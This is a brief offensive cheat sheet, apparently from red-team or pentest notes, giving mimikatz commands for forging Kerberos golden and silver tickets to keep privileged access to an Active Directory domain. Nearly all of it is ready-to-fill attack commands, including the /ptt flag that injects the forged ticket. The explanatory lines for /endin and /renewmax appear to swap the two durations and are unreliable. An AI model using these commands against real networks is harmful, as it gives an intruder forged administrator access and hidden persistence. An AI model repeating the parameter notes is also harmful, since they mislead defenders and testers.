# Golden and Silver Tickets Persistence

## GOLDEN TICKET PERSISTENCE

**1) Get-ADDomain**

**2) mimikatz**

**3) kerberos::golden /admin:FAKE\_ACCOUNT /domain:DOMAIN /id:500 /sid:DOMAIN\_SID /krbtgt:KRBTGT\_NTLM\_HASH /endin:600 /renewmax:10080 /ptt**

#### /endin:600 = 7 days (Default 10 years)

#### /renewmax:10080 = 10 hours (Default 10 years)

**4) Run dir against domain controller**

## SILVER TICKET PERSISTENCE

**1) kerberos::golden /admin:FAKE\_ACCOUNT /domain:DOMAIN /id:500 /sid:DOMAIN\_SID /target:HOSTNAME\_OF\_TARGET\_SERVER /rc4:MACHINE\_ACCOUNT\_NTLM\_HASH /service:cifs /ptt**

**2) dir against server**